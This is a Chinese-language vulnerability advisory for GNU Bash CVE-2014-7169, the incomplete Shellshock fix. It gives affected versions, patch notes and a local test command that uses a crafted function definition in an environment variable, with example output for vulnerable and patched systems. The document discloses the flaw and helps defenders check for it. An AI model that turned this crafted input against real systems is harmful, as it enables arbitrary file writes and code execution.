安全研究
安全漏洞
GNU Bash CVE-2014-6271不完整修复远程代码执行漏洞(CVE-2014-7169)
发布日期:2014-09-25
更新日期:2014-09-25
受影响系统:GNU Bash <= 4.3 bash43-025
描述:
BUGTRAQ ID:
70137
CVE(CAN) ID:
CVE-2014-7169
GNU Bash(Bourne again shell)是一个为GNU计划编写的Unix shell。
GNU Bash 4.3 bash43-025及之前版本处理环境变量值内某些畸形函数定义后尾随的字符串时存在安全漏洞,远程攻击者通过构造的环境,利用此漏洞可覆盖文件、执行任意代码、导致其他影响。此漏洞源于CVE-2014-6271的不完整修复,函数解析仍然存在问题。
<*来源:Tavis Ormandy
链接:
http://seclists.org/oss-sec/2014/q3/688
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
本地验证方法:
bash$ env -i X='() { (a)=>\' bash -c 'echo date'; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Wed Sep 24 14:12:49 PDT 2014
如果看到输出结果中有日期信息则证明受此问题影响。
bash$ env -i X='() { (a)=>\' bash -c 'echo date'; cat echo
date
cat: echo: No such file or directory
如果显示上述信息,则不受此问题影响。
建议:
厂商补丁:
GNU
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.gnu.org/software/bash
各大Linux发行版已经陆续提供针对此漏洞的补丁。
参考:
http://twitter.com/taviso/statuses/514887394294652929
http://www.openwall.com/lists/oss-security/2014/09/24/32浏览次数:5213
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |